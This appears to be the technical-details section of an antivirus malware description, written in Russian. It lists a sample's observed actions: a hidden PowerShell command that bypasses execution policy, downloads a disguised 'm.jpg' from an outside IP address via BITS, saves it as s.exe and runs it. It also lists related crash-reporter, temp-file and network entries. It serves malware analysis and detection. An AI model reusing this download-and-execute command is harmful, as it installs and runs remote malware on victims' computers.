Техническая информация
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass import-module bitstransfer;start-bitstransfer -source 'http://10#.#1.219.228/m.jpg' -destination '%appdata%/\s.exe';start-process '%appdata%\s.exe'
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\488875.cvr
- '10#.#1.219.228':80
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass import-module bitstransfer;start-bitstransfer -source 'http://10#.#1.219.228/m.jpg' -destination '%appdata%/\s.exe';start-process '%appdata%\s.exe'' (со скрытым окном)